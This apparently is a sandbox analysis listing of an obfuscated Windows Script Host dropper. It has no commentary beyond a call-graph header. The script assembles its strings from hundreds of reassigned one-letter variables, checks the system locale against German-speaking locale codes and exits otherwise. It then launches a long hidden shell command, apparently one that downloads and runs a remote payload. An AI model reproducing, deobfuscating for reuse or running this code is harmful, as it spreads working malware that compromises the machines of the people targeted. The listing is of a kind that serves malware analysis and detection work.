Has exited: | false |
Call Graph
Graph
- Executed
- Not Executed
Script: |
---|
Code | ||
---|---|---|
0 | function kizzlu() { |
|
1 | zqzynv = [ 1031, 3079, 5127, 4103, 2055, 3072 ]; | |
2 | var wjlakoz = this[nzrevndvn + dpcpzoue + mxjtdiq + upnxm + ttwxg + dynoutmti + eidhxooc + fiiqktlb] ( this[hbyqog + fvumoj + erqwnvwf + mxjtdiq + gkvcn + nzrevndvn + fiiqktlb][kjjuacuq + mxjtdiq + ttwxg + dpcpzoue + fiiqktlb + ttwxg + vzaji + dmpxi + fkukqbc + ttwxg + erqwnvwf + fiiqktlb] ( hbyqog + fvumoj + erqwnvwf + mxjtdiq + gkvcn + nzrevndvn + fiiqktlb + elbssx + fvumoj + ntivinsy + ttwxg + umjys + umjys ) [apyuodhf + ttwxg + pasted + apyuodhf + ttwxg + dpcpzoue + ewkdgcy] ( aexwmozqm + gtnpxe + xhuawzo + wgatwa + yeresynll + kjjuacuq + jaqqrl + apyuodhf + apyuodhf + xhuawzo + aiwkwl + jfrtlu + yeresynll + jaqqrl + fvumoj + xhuawzo + apyuodhf + etixd + kjjuacuq + reqbckc + eidhxooc + fiiqktlb + mxjtdiq + reqbckc + umjys + jwvmeorh + qdohkj + dpcpzoue + eidhxooc + ttwxg + umjys + etixd + dynoutmti + eidhxooc + fiiqktlb + ttwxg + mxjtdiq + eidhxooc + dpcpzoue + fiiqktlb + gkvcn + reqbckc + eidhxooc + dpcpzoue + umjys + etixd + safayfgl + reqbckc + erqwnvwf + dpcpzoue + umjys + ttwxg ), 16 ); |
|
3 | for ( phwpuklf = 0 ; phwpuklf < zqzynv[umjys + ttwxg + eidhxooc + pasted + fiiqktlb + ntivinsy] ; ++ phwpuklf ) | |
4 | { | |
5 | if ( wjlakoz == zqzynv[phwpuklf] ) | |
6 | { | |
7 | wjlakoz = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( wjlakoz !== true ) | |
12 | this[hbyqog + fvumoj + erqwnvwf + mxjtdiq + gkvcn + nzrevndvn + fiiqktlb][nkiztlxp + eexkgbx + gkvcn + fiiqktlb] ( ); | |
13 | this[hbyqog + fvumoj + erqwnvwf + mxjtdiq + gkvcn + nzrevndvn + fiiqktlb][kjjuacuq + mxjtdiq + ttwxg + dpcpzoue + fiiqktlb + ttwxg + vzaji + dmpxi + fkukqbc + ttwxg + erqwnvwf + fiiqktlb] ( hbyqog + fvumoj + erqwnvwf + mxjtdiq + gkvcn + nzrevndvn + fiiqktlb + elbssx + fvumoj + ntivinsy + ttwxg + umjys + umjys ) [mxjtdiq + eexkgbx + eidhxooc] ( erqwnvwf + ytbxs + ewkdgcy + jwvmeorh + mkdpgtbr + erqwnvwf + jwvmeorh + nzrevndvn + reqbckc + iksjdqir + ttwxg + mxjtdiq + upnxm + ntivinsy + ttwxg + umjys + umjys + elbssx + ttwxg + gxznv + ttwxg + jwvmeorh + hezozhu + kjjuacuq + reqbckc + ytbxs + ytbxs + dpcpzoue + eidhxooc + ewkdgcy + jwvmeorh + rrsqsnii + dynoutmti + eidhxooc + uwjbtp + reqbckc + cuqefx + ttwxg + hezozhu + hbyqog + ttwxg + dmpxi + apyuodhf + ttwxg + mjxpdslz + eexkgbx + ttwxg + upnxm + fiiqktlb + jwvmeorh + hezozhu + vzaji + eexkgbx + fiiqktlb + tmrypfq + gkvcn + umjys + ttwxg + jwvmeorh + dulakdfo + fiiqktlb + ttwxg + ytbxs + nzrevndvn + dulakdfo + etixd + gkvcn + eidhxooc + uwjbtp + reqbckc + gkvcn + erqwnvwf + ttwxg + elbssx + nzrevndvn + ewkdgcy + kybhy + jwvmeorh + ntivinsy + fiiqktlb + fiiqktlb + nzrevndvn + khirvk + mkdpgtbr + mkdpgtbr + ztqemsqje + ecxwm + vsfyglvh + elbssx + ztqemsqje + klkvmccc + vsfyglvh + elbssx + ztqemsqje + elbssx + mynfwl + qusdo + terdgcp + mkdpgtbr + gkvcn + eidhxooc + uwjbtp + reqbckc + gkvcn + erqwnvwf + ttwxg + elbssx + nzrevndvn + ntivinsy + nzrevndvn + rrsqsnii + kkudhc + kkudhc + upnxm + fiiqktlb + dpcpzoue + mxjtdiq + fiiqktlb + jwvmeorh + dulakdfo + fiiqktlb + ttwxg + ytbxs + nzrevndvn + dulakdfo + etixd + gkvcn + eidhxooc + uwjbtp + reqbckc + gkvcn + erqwnvwf + ttwxg + elbssx + nzrevndvn + ewkdgcy + kybhy + kkudhc + kkudhc + erqwnvwf + ytbxs + ewkdgcy + jwvmeorh + mkdpgtbr + erqwnvwf + jwvmeorh + eidhxooc + ttwxg + fiiqktlb + jwvmeorh + eexkgbx + upnxm + ttwxg + jwvmeorh + etixd + etixd + ztqemsqje + ecxwm + vsfyglvh + elbssx + ztqemsqje + klkvmccc + vsfyglvh + elbssx + ztqemsqje + elbssx + mynfwl + qusdo + terdgcp + quvggqrid + umczrmahy + umczrmahy + umczrmahy + umczrmahy + etixd + ewkdgcy + dpcpzoue + uwjbtp + iksjdqir + iksjdqir + iksjdqir + mxjtdiq + reqbckc + reqbckc + fiiqktlb + etixd + kkudhc + kkudhc + erqwnvwf + ytbxs + ewkdgcy + jwvmeorh + mkdpgtbr + erqwnvwf + jwvmeorh + mxjtdiq + ttwxg + pasted + upnxm + uwjbtp + mxjtdiq + vsfyglvh + mynfwl + jwvmeorh + mkdpgtbr + upnxm + jwvmeorh + etixd + etixd + ztqemsqje + ecxwm + vsfyglvh + elbssx + ztqemsqje + klkvmccc + vsfyglvh + elbssx + ztqemsqje + elbssx + mynfwl + qusdo + terdgcp + quvggqrid + umczrmahy + umczrmahy + umczrmahy + umczrmahy + etixd + ewkdgcy + dpcpzoue + uwjbtp + iksjdqir + iksjdqir + iksjdqir + mxjtdiq + reqbckc + reqbckc + fiiqktlb + etixd + mynfwl + bltrj + vsfyglvh + mynfwl + vsfyglvh + mynfwl + qldwhqk + ecxwm + ztqemsqje + mynfwl + bltrj + qusdo + umczrmahy + umczrmahy + elbssx + ewkdgcy + umjys + umjys, 0, false ); |
|
14 | } | |
15 | kjjuacuq = "n"; | |
16 | kjjuacuq = "j"; | |
17 | kjjuacuq = "o"; | |
18 | kjjuacuq = "u"; | |
19 | kjjuacuq = "v"; | |
20 | kjjuacuq = "i"; | |
21 | kjjuacuq = "d"; | |
22 | kjjuacuq = "W"; | |
23 | kjjuacuq = "R"; | |
24 | kjjuacuq = "B"; | |
25 | kjjuacuq = "Z"; | |
26 | kjjuacuq = "F"; | |
27 | kjjuacuq = "X"; | |
28 | kjjuacuq = "o"; | |
29 | kjjuacuq = "G"; | |
30 | kjjuacuq = "k"; | |
31 | kjjuacuq = "p"; | |
32 | kjjuacuq = "C"; | |
33 | ttwxg = "N"; | |
34 | ttwxg = "p"; | |
35 | ttwxg = "I"; | |
36 | ttwxg = "R"; | |
37 | ttwxg = "H"; | |
38 | ttwxg = "G"; | |
39 | ttwxg = "m"; | |
40 | ttwxg = "T"; | |
41 | ttwxg = "M"; | |
42 | ttwxg = "d"; | |
43 | ttwxg = "C"; | |
44 | ttwxg = "e"; | |
45 | jfrtlu = "g"; | |
46 | jfrtlu = "y"; | |
47 | jfrtlu = "g"; | |
48 | jfrtlu = "m"; | |
49 | jfrtlu = "T"; | |
50 | aexwmozqm = "Q"; | |
51 | aexwmozqm = "L"; | |
52 | aexwmozqm = "l"; | |
53 | aexwmozqm = "m"; | |
54 | aexwmozqm = "J"; | |
55 | aexwmozqm = "g"; | |
56 | aexwmozqm = "J"; | |
57 | aexwmozqm = "D"; | |
58 | aexwmozqm = "J"; | |
59 | aexwmozqm = "s"; | |
60 | aexwmozqm = "D"; | |
61 | aexwmozqm = "R"; | |
62 | aexwmozqm = "U"; | |
63 | aexwmozqm = "T"; | |
64 | aexwmozqm = "b"; | |
65 | aexwmozqm = "P"; | |
66 | aexwmozqm = "L"; | |
67 | aexwmozqm = "H"; | |
68 | nzrevndvn = "Q"; | |
69 | nzrevndvn = "i"; | |
70 | nzrevndvn = "O"; | |
71 | nzrevndvn = "r"; | |
72 | nzrevndvn = "t"; | |
73 | nzrevndvn = "B"; | |
74 | nzrevndvn = "K"; | |
75 | nzrevndvn = "S"; | |
76 | nzrevndvn = "Z"; | |
77 | nzrevndvn = "A"; | |
78 | nzrevndvn = "Q"; | |
79 | nzrevndvn = "w"; | |
80 | nzrevndvn = "i"; | |
81 | nzrevndvn = "U"; | |
82 | nzrevndvn = "C"; | |
83 | nzrevndvn = "w"; | |
84 | nzrevndvn = "Y"; | |
85 | nzrevndvn = "a"; | |
86 | nzrevndvn = "i"; | |
87 | nzrevndvn = "b"; | |
88 | nzrevndvn = "h"; | |
89 | nzrevndvn = "c"; | |
90 | nzrevndvn = "K"; | |
91 | nzrevndvn = "m"; | |
92 | nzrevndvn = "L"; | |
93 | nzrevndvn = "f"; | |
94 | nzrevndvn = "j"; | |
95 | nzrevndvn = "x"; | |
96 | nzrevndvn = "t"; | |
97 | nzrevndvn = "U"; | |
98 | nzrevndvn = "B"; | |
99 | nzrevndvn = "l"; | |
100 | nzrevndvn = "H"; | |
101 | nzrevndvn = "p"; | |
102 | ewkdgcy = "a"; | |
103 | ewkdgcy = "u"; | |
104 | ewkdgcy = "H"; | |
105 | ewkdgcy = "g"; | |
106 | ewkdgcy = "N"; | |
107 | ewkdgcy = "c"; | |
108 | ewkdgcy = "s"; | |
109 | ewkdgcy = "v"; | |
110 | ewkdgcy = "r"; | |
111 | ewkdgcy = "k"; | |
112 | ewkdgcy = "d"; | |
113 | dmpxi = "V"; | |
114 | dmpxi = "i"; | |
115 | dmpxi = "Q"; | |
116 | dmpxi = "n"; | |
117 | dmpxi = "g"; | |
118 | dmpxi = "g"; | |
119 | dmpxi = "f"; | |
120 | dmpxi = "p"; | |
121 | dmpxi = "G"; | |
122 | dmpxi = "b"; | |
123 | fvumoj = "w"; | |
124 | fvumoj = "W"; | |
125 | fvumoj = "X"; | |
126 | fvumoj = "A"; | |
127 | fvumoj = "p"; | |
128 | fvumoj = "v"; | |
129 | fvumoj = "D"; | |
130 | fvumoj = "O"; | |
131 | fvumoj = "Q"; | |
132 | fvumoj = "B"; | |
133 | fvumoj = "q"; | |
134 | fvumoj = "j"; | |
135 | fvumoj = "j"; | |
136 | fvumoj = "S"; | |
137 | mxjtdiq = "a"; | |
138 | mxjtdiq = "Y"; | |
139 | mxjtdiq = "U"; | |
140 | mxjtdiq = "z"; | |
141 | mxjtdiq = "U"; | |
142 | mxjtdiq = "u"; | |
143 | mxjtdiq = "h"; | |
144 | mxjtdiq = "M"; | |
145 | mxjtdiq = "f"; | |
146 | mxjtdiq = "r"; | |
147 | mxjtdiq = "i"; | |
148 | mxjtdiq = "B"; | |
149 | mxjtdiq = "H"; | |
150 | mxjtdiq = "E"; | |
151 | mxjtdiq = "X"; | |
152 | mxjtdiq = "U"; | |
153 | mxjtdiq = "K"; | |
154 | mxjtdiq = "r"; | |
155 | ytbxs = "e"; | |
156 | ytbxs = "A"; | |
157 | ytbxs = "w"; | |
158 | ytbxs = "b"; | |
159 | ytbxs = "L"; | |
160 | ytbxs = "m"; | |
161 | hezozhu = "X"; | |
162 | hezozhu = "h"; | |
163 | hezozhu = "l"; | |
164 | hezozhu = "U"; | |
165 | hezozhu = "s"; | |
166 | hezozhu = "j"; | |
167 | hezozhu = "w"; | |
168 | hezozhu = "M"; | |
169 | hezozhu = "y"; | |
170 | hezozhu = "D"; | |
171 | hezozhu = "S"; | |
172 | hezozhu = "a"; | |
173 | hezozhu = "w"; | |
174 | hezozhu = "N"; | |
175 | hezozhu = "k"; | |
176 | hezozhu = "J"; | |
177 | hezozhu = "w"; | |
178 | hezozhu = "L"; | |
179 | hezozhu = "C"; | |
180 | hezozhu = "-"; | |
181 | mynfwl = "r"; | |
182 | mynfwl = "X"; | |
183 | mynfwl = "Y"; | |
184 | mynfwl = "f"; | |
185 | mynfwl = "m"; | |
186 | mynfwl = "H"; | |
187 | mynfwl = "n"; | |
188 | mynfwl = "a"; | |
189 | mynfwl = "G"; | |
190 | mynfwl = "l"; | |
191 | mynfwl = "s"; | |
192 | mynfwl = "w"; | |
193 | mynfwl = "k"; | |
194 | mynfwl = "C"; | |
195 | mynfwl = "D"; | |
196 | mynfwl = "n"; | |
197 | mynfwl = "d"; | |
198 | mynfwl = "I"; | |
199 | mynfwl = "m"; | |
200 | mynfwl = "c"; | |
201 | mynfwl = "q"; | |
202 | mynfwl = "i"; | |
203 | mynfwl = "m"; | |
204 | mynfwl = "z"; | |
205 | mynfwl = "M"; | |
206 | mynfwl = "k"; | |
207 | mynfwl = "Z"; | |
208 | mynfwl = "v"; | |
209 | mynfwl = "P"; | |
210 | mynfwl = "b"; | |
211 | mynfwl = "D"; | |
212 | mynfwl = "a"; | |
213 | mynfwl = "W"; | |
214 | mynfwl = "Y"; | |
215 | mynfwl = "M"; | |
216 | mynfwl = "Z"; | |
217 | mynfwl = "m"; | |
218 | mynfwl = "z"; | |
219 | mynfwl = "P"; | |
220 | mynfwl = "c"; | |
221 | mynfwl = "S"; | |
222 | mynfwl = "j"; | |
223 | mynfwl = "w"; | |
224 | mynfwl = "2"; | |
225 | upnxm = "C"; | |
226 | upnxm = "t"; | |
227 | upnxm = "O"; | |
228 | upnxm = "g"; | |
229 | upnxm = "r"; | |
230 | upnxm = "R"; | |
231 | upnxm = "u"; | |
232 | upnxm = "a"; | |
233 | upnxm = "b"; | |
234 | upnxm = "V"; | |
235 | upnxm = "J"; | |
236 | upnxm = "R"; | |
237 | upnxm = "Y"; | |
238 | upnxm = "L"; | |
239 | upnxm = "R"; | |
240 | upnxm = "v"; | |
241 | upnxm = "r"; | |
242 | upnxm = "M"; | |
243 | upnxm = "O"; | |
244 | upnxm = "v"; | |
245 | upnxm = "A"; | |
246 | upnxm = "f"; | |
247 | upnxm = "v"; | |
248 | upnxm = "d"; | |
249 | upnxm = "M"; | |
250 | upnxm = "z"; | |
251 | upnxm = "H"; | |
252 | upnxm = "s"; | |
253 | ztqemsqje = "S"; | |
254 | ztqemsqje = "A"; | |
255 | ztqemsqje = "c"; | |
256 | ztqemsqje = "h"; | |
257 | ztqemsqje = "r"; | |
258 | ztqemsqje = "k"; | |
259 | ztqemsqje = "F"; | |
260 | ztqemsqje = "D"; | |
261 | ztqemsqje = "N"; | |
262 | ztqemsqje = "u"; | |
263 | ztqemsqje = "M"; | |
264 | ztqemsqje = "o"; | |
265 | ztqemsqje = "v"; | |
266 | ztqemsqje = "g"; | |
267 | ztqemsqje = "R"; | |
268 | ztqemsqje = "q"; | |
269 | ztqemsqje = "J"; | |
270 | ztqemsqje = "W"; | |
271 | ztqemsqje = "E"; | |
272 | ztqemsqje = "m"; | |
273 | ztqemsqje = "F"; | |
274 | ztqemsqje = "n"; | |
275 | ztqemsqje = "y"; | |
276 | ztqemsqje = "h"; | |
277 | ztqemsqje = "s"; | |
278 | ztqemsqje = "A"; | |
279 | ztqemsqje = "z"; | |
280 | ztqemsqje = "r"; | |
281 | ztqemsqje = "1"; | |
282 | khirvk = "G"; | |
283 | khirvk = "C"; | |
284 | khirvk = "G"; | |
285 | khirvk = "M"; | |
286 | khirvk = "V"; | |
287 | khirvk = "P"; | |
288 | khirvk = "K"; | |
289 | khirvk = "k"; | |
290 | khirvk = "l"; | |
291 | khirvk = "U"; | |
292 | khirvk = "m"; | |
293 | khirvk = "v"; | |
294 | khirvk = "T"; | |
295 | khirvk = "B"; | |
296 | khirvk = "W"; | |
297 | khirvk = "R"; | |
298 | khirvk = "u"; | |
299 | khirvk = "N"; | |
300 | khirvk = "C"; | |
301 | khirvk = "S"; | |
302 | khirvk = "J"; | |
303 | khirvk = "f"; | |
304 | khirvk = "O"; | |
305 | khirvk = "a"; | |
306 | khirvk = "O"; | |
307 | khirvk = "P"; | |
308 | khirvk = "b"; | |
309 | khirvk = "w"; | |
310 | khirvk = "g"; | |
311 | khirvk = "f"; | |
312 | khirvk = "e"; | |
313 | khirvk = "k"; | |
314 | khirvk = "J"; | |
315 | khirvk = "c"; | |
316 | khirvk = "w"; | |
317 | khirvk = "u"; | |
318 | khirvk = "z"; | |
319 | khirvk = "O"; | |
320 | khirvk = "E"; | |
321 | khirvk = "f"; | |
322 | khirvk = ":"; | |
323 | dpcpzoue = "m"; | |
324 | dpcpzoue = "r"; | |
325 | dpcpzoue = "b"; | |
326 | dpcpzoue = "G"; | |
327 | dpcpzoue = "R"; | |
328 | dpcpzoue = "L"; | |
329 | dpcpzoue = "g"; | |
330 | dpcpzoue = "U"; | |
331 | dpcpzoue = "o"; | |
332 | dpcpzoue = "D"; | |
333 | dpcpzoue = "d"; | |
334 | dpcpzoue = "m"; | |
335 | dpcpzoue = "r"; | |
336 | dpcpzoue = "F"; | |
337 | dpcpzoue = "R"; | |
338 | dpcpzoue = "l"; | |
339 | dpcpzoue = "I"; | |
340 | dpcpzoue = "Q"; | |
341 | dpcpzoue = "m"; | |
342 | dpcpzoue = "a"; | |
343 | dpcpzoue = "s"; | |
344 | dpcpzoue = "j"; | |
345 | dpcpzoue = "t"; | |
346 | dpcpzoue = "L"; | |
347 | dpcpzoue = "E"; | |
348 | dpcpzoue = "l"; | |
349 | dpcpzoue = "y"; | |
350 | dpcpzoue = "l"; | |
351 | dpcpzoue = "a"; | |
352 | umjys = "I"; | |
353 | umjys = "P"; | |
354 | umjys = "m"; | |
355 | umjys = "z"; | |
356 | umjys = "v"; | |
357 | umjys = "h"; | |
358 | umjys = "c"; | |
359 | umjys = "s"; | |
360 | umjys = "C"; | |
361 | umjys = "x"; | |
362 | umjys = "M"; | |
363 | umjys = "B"; | |
364 | umjys = "n"; | |
365 | umjys = "X"; | |
366 | umjys = "e"; | |
367 | umjys = "w"; | |
368 | umjys = "r"; | |
369 | umjys = "I"; | |
370 | umjys = "Y"; | |
371 | umjys = "p"; | |
372 | umjys = "H"; | |
373 | umjys = "b"; | |
374 | umjys = "Z"; | |
375 | umjys = "n"; | |
376 | umjys = "C"; | |
377 | umjys = "X"; | |
378 | umjys = "x"; | |
379 | umjys = "i"; | |
380 | umjys = "B"; | |
381 | umjys = "e"; | |
382 | umjys = "I"; | |
383 | umjys = "A"; | |
384 | umjys = "L"; | |
385 | umjys = "v"; | |
386 | umjys = "i"; | |
387 | umjys = "Y"; | |
388 | umjys = "f"; | |
389 | umjys = "M"; | |
390 | umjys = "k"; | |
391 | umjys = "d"; | |
392 | umjys = "O"; | |
393 | umjys = "X"; | |
394 | umjys = "P"; | |
395 | umjys = "l"; | |
396 | uwjbtp = "n"; | |
397 | uwjbtp = "h"; | |
398 | uwjbtp = "R"; | |
399 | uwjbtp = "H"; | |
400 | uwjbtp = "U"; | |
401 | uwjbtp = "e"; | |
402 | uwjbtp = "L"; | |
403 | uwjbtp = "S"; | |
404 | uwjbtp = "H"; | |
405 | uwjbtp = "J"; | |
406 | uwjbtp = "G"; | |
407 | uwjbtp = "t"; | |
408 | uwjbtp = "z"; | |
409 | uwjbtp = "y"; | |
410 | uwjbtp = "T"; | |
411 | uwjbtp = "P"; | |
412 | uwjbtp = "v"; | |
413 | qusdo = "r"; | |
414 | qusdo = "d"; | |
415 | qusdo = "x"; | |
416 | qusdo = "w"; | |
417 | qusdo = "L"; | |
418 | qusdo = "O"; | |
419 | qusdo = "M"; | |
420 | qusdo = "z"; | |
421 | qusdo = "B"; | |
422 | qusdo = "T"; | |
423 | qusdo = "l"; | |
424 | qusdo = "R"; | |
425 | qusdo = "Q"; | |
426 | qusdo = "B"; | |
427 | qusdo = "k"; | |
428 | qusdo = "f"; | |
429 | qusdo = "j"; | |
430 | qusdo = "v"; | |
431 | qusdo = "n"; | |
432 | qusdo = "V"; | |
433 | qusdo = "f"; | |
434 | qusdo = "v"; | |
435 | qusdo = "E"; | |
436 | qusdo = "d"; | |
437 | qusdo = "Q"; | |
438 | qusdo = "X"; | |
439 | qusdo = "0"; | |
440 | wgatwa = "l"; | |
441 | wgatwa = "x"; | |
442 | wgatwa = "R"; | |
443 | wgatwa = "f"; | |
444 | wgatwa = "C"; | |
445 | wgatwa = "o"; | |
446 | wgatwa = "T"; | |
447 | wgatwa = "A"; | |
448 | wgatwa = "m"; | |
449 | wgatwa = "f"; | |
450 | wgatwa = "Y"; | |
451 | wgatwa = "c"; | |
452 | wgatwa = "O"; | |
453 | wgatwa = "q"; | |
454 | wgatwa = "Q"; | |
455 | wgatwa = "m"; | |
456 | wgatwa = "P"; | |
457 | wgatwa = "s"; | |
458 | wgatwa = "l"; | |
459 | wgatwa = "I"; | |
460 | wgatwa = "q"; | |
461 | wgatwa = "U"; | |
462 | wgatwa = "o"; | |
463 | wgatwa = "w"; | |
464 | wgatwa = "o"; | |
465 | wgatwa = "X"; | |
466 | wgatwa = "J"; | |
467 | wgatwa = "O"; | |
468 | wgatwa = "Q"; | |
469 | wgatwa = "y"; | |
470 | wgatwa = "s"; | |
471 | wgatwa = "F"; | |
472 | wgatwa = "J"; | |
473 | wgatwa = "v"; | |
474 | wgatwa = "y"; | |
475 | wgatwa = "Z"; | |
476 | wgatwa = "d"; | |
477 | wgatwa = "E"; | |
478 | wgatwa = "Y"; | |
479 | jwvmeorh = "e"; | |
480 | jwvmeorh = "k"; | |
481 | jwvmeorh = "u"; | |
482 | jwvmeorh = "R"; | |
483 | jwvmeorh = "d"; | |
484 | jwvmeorh = "B"; | |
485 | jwvmeorh = "N"; | |
486 | jwvmeorh = "h"; | |
487 | jwvmeorh = "N"; | |
488 | jwvmeorh = "M"; | |
489 | jwvmeorh = "T"; | |
490 | jwvmeorh = "k"; | |
491 | jwvmeorh = "n"; | |
492 | jwvmeorh = "P"; | |
493 | jwvmeorh = "U"; | |
494 | jwvmeorh = "s"; | |
495 | jwvmeorh = "t"; | |
496 | jwvmeorh = "l"; | |
497 | jwvmeorh = "H"; | |
498 | jwvmeorh = "V"; | |
499 | jwvmeorh = "I"; | |
500 | jwvmeorh = "G"; | |
501 | jwvmeorh = "y"; | |
502 | jwvmeorh = "U"; | |
503 | jwvmeorh = "t"; | |
504 | jwvmeorh = "n"; | |
505 | jwvmeorh = "K"; | |
506 | jwvmeorh = "Z"; | |
507 | jwvmeorh = "T"; | |
508 | jwvmeorh = "D"; | |
509 | jwvmeorh = "p"; | |
510 | jwvmeorh = "q"; | |
511 | jwvmeorh = "k"; | |
512 | jwvmeorh = "J"; | |
513 | jwvmeorh = "q"; | |
514 | jwvmeorh = "z"; | |
515 | jwvmeorh = "j"; | |
516 | jwvmeorh = "j"; | |
517 | jwvmeorh = "o"; | |
518 | jwvmeorh = "Q"; | |
519 | jwvmeorh = "K"; | |
520 | jwvmeorh = "n"; | |
521 | jwvmeorh = "G"; | |
522 | jwvmeorh = " "; | |
523 | eexkgbx = "y"; | |
524 | eexkgbx = "u"; | |
525 | gtnpxe = "A"; | |
526 | gtnpxe = "R"; | |
527 | gtnpxe = "Y"; | |
528 | gtnpxe = "S"; | |
529 | gtnpxe = "L"; | |
530 | gtnpxe = "v"; | |
531 | gtnpxe = "D"; | |
532 | gtnpxe = "i"; | |
533 | gtnpxe = "D"; | |
534 | gtnpxe = "T"; | |
535 | gtnpxe = "f"; | |
536 | gtnpxe = "n"; | |
537 | gtnpxe = "o"; | |
538 | gtnpxe = "e"; | |
539 | gtnpxe = "H"; | |
540 | gtnpxe = "M"; | |
541 | gtnpxe = "H"; | |
542 | gtnpxe = "h"; | |
543 | gtnpxe = "i"; | |
544 | gtnpxe = "V"; | |
545 | gtnpxe = "M"; | |
546 | gtnpxe = "M"; | |
547 | gtnpxe = "l"; | |
548 | gtnpxe = "R"; | |
549 | gtnpxe = "s"; | |
550 | gtnpxe = "m"; | |
551 | gtnpxe = "e"; | |
552 | gtnpxe = "R"; | |
553 | gtnpxe = "g"; | |
554 | gtnpxe = "w"; | |
555 | gtnpxe = "v"; | |
556 | gtnpxe = "h"; | |
557 | gtnpxe = "B"; | |
558 | gtnpxe = "p"; | |
559 | gtnpxe = "l"; | |
560 | gtnpxe = "Z"; | |
561 | gtnpxe = "B"; | |
562 | gtnpxe = "n"; | |
563 | gtnpxe = "w"; | |
564 | gtnpxe = "h"; | |
565 | gtnpxe = "x"; | |
566 | gtnpxe = "J"; | |
567 | gtnpxe = "O"; | |
568 | gtnpxe = "e"; | |
569 | gtnpxe = "K"; | |
570 | qldwhqk = "i"; | |
571 | qldwhqk = "V"; | |
572 | qldwhqk = "u"; | |
573 | qldwhqk = "e"; | |
574 | qldwhqk = "U"; | |
575 | qldwhqk = "m"; | |
576 | qldwhqk = "O"; | |
577 | qldwhqk = "d"; | |
578 | qldwhqk = "W"; | |
579 | qldwhqk = "w"; | |
580 | qldwhqk = "h"; | |
581 | qldwhqk = "v"; | |
582 | qldwhqk = "W"; | |
583 | qldwhqk = "J"; | |
584 | qldwhqk = "m"; | |
585 | qldwhqk = "u"; | |
586 | qldwhqk = "T"; | |
587 | qldwhqk = "F"; | |
588 | qldwhqk = "P"; | |
589 | qldwhqk = "L"; | |
590 | qldwhqk = "v"; | |
591 | qldwhqk = "i"; | |
592 | qldwhqk = "w"; | |
593 | qldwhqk = "w"; | |
594 | qldwhqk = "r"; | |
595 | qldwhqk = "y"; | |
596 | qldwhqk = "b"; | |
597 | qldwhqk = "Z"; | |
598 | qldwhqk = "n"; | |
599 | qldwhqk = "W"; | |
600 | qldwhqk = "l"; | |
601 | qldwhqk = "k"; | |
602 | qldwhqk = "n"; | |
603 | qldwhqk = "R"; | |
604 | qldwhqk = "g"; | |
605 | qldwhqk = "o"; | |
606 | qldwhqk = "k"; | |
607 | qldwhqk = "p"; | |
608 | qldwhqk = "v"; | |
609 | qldwhqk = "S"; | |
610 | qldwhqk = "f"; | |
611 | qldwhqk = "h"; | |
612 | qldwhqk = "M"; | |
613 | qldwhqk = "7"; | |
614 | mjxpdslz = "u"; | |
615 | mjxpdslz = "R"; | |
616 | mjxpdslz = "O"; | |
617 | mjxpdslz = "J"; | |
618 | mjxpdslz = "J"; | |
619 | mjxpdslz = "A"; | |
620 | mjxpdslz = "Q"; | |
621 | mjxpdslz = "v"; | |
622 | mjxpdslz = "j"; | |
623 | mjxpdslz = "k"; | |
624 | mjxpdslz = "k"; | |
625 | mjxpdslz = "B"; | |
626 | mjxpdslz = "l"; | |
627 | mjxpdslz = "m"; | |
628 | mjxpdslz = "p"; | |
629 | mjxpdslz = "u"; | |
630 | mjxpdslz = "r"; | |
631 | mjxpdslz = "q"; | |
632 | jaqqrl = "Q"; | |
633 | jaqqrl = "P"; | |
634 | jaqqrl = "h"; | |
635 | jaqqrl = "K"; | |
636 | jaqqrl = "R"; | |
637 | jaqqrl = "a"; | |
638 | jaqqrl = "H"; | |
639 | jaqqrl = "y"; | |
640 | jaqqrl = "l"; | |
641 | jaqqrl = "O"; | |
642 | jaqqrl = "i"; | |
643 | jaqqrl = "l"; | |
644 | jaqqrl = "N"; | |
645 | jaqqrl = "T"; | |
646 | jaqqrl = "A"; | |
647 | jaqqrl = "Z"; | |
648 | jaqqrl = "U"; | |
649 | elbssx = "f"; | |
650 | elbssx = "p"; | |
651 | elbssx = "z"; | |
652 | elbssx = "."; | |
653 | klkvmccc = "K"; | |
654 | klkvmccc = "G"; | |
655 | klkvmccc = "Z"; | |
656 | klkvmccc = "C"; | |
657 | klkvmccc = "i"; | |
658 | klkvmccc = "C"; | |
659 | klkvmccc = "l"; | |
660 | klkvmccc = "w"; | |
661 | klkvmccc = "B"; | |
662 | klkvmccc = "H"; | |
663 | klkvmccc = "K"; | |
664 | klkvmccc = "c"; | |
665 | klkvmccc = "S"; | |
666 | klkvmccc = "f"; | |
667 | klkvmccc = "T"; | |
668 | klkvmccc = "l"; | |
669 | klkvmccc = "i"; | |
670 | klkvmccc = "m"; | |
671 | klkvmccc = "e"; | |
672 | klkvmccc = "4"; | |
673 | pasted = "n"; | |
674 | pasted = "a"; | |
675 | pasted = "y"; | |
676 | pasted = "w"; | |
677 | pasted = "E"; | |
678 | pasted = "k"; | |
679 | pasted = "u"; | |
680 | pasted = "N"; | |
681 | pasted = "h"; | |
682 | pasted = "v"; | |
683 | pasted = "B"; | |
684 | pasted = "d"; | |
685 | pasted = "c"; | |
686 | pasted = "E"; | |
687 | pasted = "T"; | |
688 | pasted = "M"; | |
689 | pasted = "P"; | |
690 | pasted = "H"; | |
691 | pasted = "w"; | |
692 | pasted = "l"; | |
693 | pasted = "U"; | |
694 | pasted = "h"; | |
695 | pasted = "g"; | |
696 | pasted = "f"; | |
697 | pasted = "W"; | |
698 | pasted = "O"; | |
699 | pasted = "g"; | |
700 | nkiztlxp = "h"; | |
701 | nkiztlxp = "T"; | |
702 | nkiztlxp = "h"; | |
703 | nkiztlxp = "k"; | |
704 | nkiztlxp = "n"; | |
705 | nkiztlxp = "g"; | |
706 | nkiztlxp = "B"; | |
707 | nkiztlxp = "f"; | |
708 | nkiztlxp = "D"; | |
709 | nkiztlxp = "o"; | |
710 | nkiztlxp = "E"; | |
711 | nkiztlxp = "M"; | |
712 | nkiztlxp = "g"; | |
713 | nkiztlxp = "M"; | |
714 | nkiztlxp = "A"; | |
715 | nkiztlxp = "h"; | |
716 | nkiztlxp = "Q"; | |
717 | nkiztlxp = "u"; | |
718 | nkiztlxp = "r"; | |
719 | nkiztlxp = "W"; | |
720 | nkiztlxp = "V"; | |
721 | nkiztlxp = "N"; | |
722 | nkiztlxp = "y"; | |
723 | nkiztlxp = "e"; | |
724 | nkiztlxp = "o"; | |
725 | nkiztlxp = "y"; | |
726 | nkiztlxp = "w"; | |
727 | nkiztlxp = "p"; | |
728 | nkiztlxp = "r"; | |
729 | nkiztlxp = "L"; | |
730 | nkiztlxp = "E"; | |
731 | nkiztlxp = "S"; | |
732 | nkiztlxp = "t"; | |
